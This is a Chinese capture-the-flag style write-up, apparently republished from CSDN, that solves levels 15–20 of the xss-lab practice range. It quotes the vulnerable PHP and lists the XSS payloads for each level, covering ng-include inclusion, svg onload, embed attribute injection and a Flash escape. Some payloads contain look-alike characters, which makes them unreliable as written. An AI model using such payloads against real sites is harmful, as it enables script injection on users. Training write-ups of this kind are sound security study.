欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 汽车 > 维修 > xss-lab靶场的level15-level20

xss-lab靶场的level15-level20

2024/10/23 23:28:44 来源:https://blog.csdn.net/qq_64775230/article/details/139754472  浏览:    关键词:xss-lab靶场的level15-level20

这一部分后面四个全部是flash的xss漏洞

建议先了解一下这一漏洞详情Flash XSS 漏洞详解 根治的好办法-CSDN博客

然后记得在自己浏览器上下载一个flash插件

level15
window.location.href="level16.php?keyword=test";
但是输入keyword没啥用
于是查看源代码发现
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>
get提交的参数是src,并且被html实体化
而且ng-include 是 AngularJS 中的一个指令,它允许你在一个 HTML 元素中动态地包含另一个 HTML 片段。这个指令会根据提供的 URL 或者 AngularJS 表达式来加载、编译并包含外部 HTML 内容。
并且可以无视转换实体

?src='/level1.php?name=<img src=1 οnmοuseοver=alert()>'

level16
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace(" ","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>

?keyword=<svg%0Aοnlοad=alert(1)>


level17:
f12查看源代码
<embed src=xsf01.swf?= width=100% heigth=100%><h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>

swf后缀的文件是flash插件文件
embed标签定义了一个容器,用来嵌入外部应用或者互动程序,可以等效于img、iframe、video等
这道题需要下一个flash浏览器,建议官网下flash
或者修改一下
echo "<embed src=index.php?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
再构造payload
?arg02= οnclick=alert()

level18
<embed src=xsf02.swf?a=b width=100% heigth=100%></body>
依然有一个swf文件,修改一下
?arg02= οnmοusedοwn=alert()

level19
这一关用的是flash的xss漏洞,可以看这篇文章
https://blog.csdn.net/weixin_30702413/article/details/99326627

?arg01=version&arg02=<a href="javascript:alert()">here</a>

level20
这一关依然是flash的xss注入
这一关我就直接用csdn上某位大佬的代码进行注入
?arg01=id&arg02=xss\"))}catch(e){alert(1)}//%26width=123%26height=123
 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com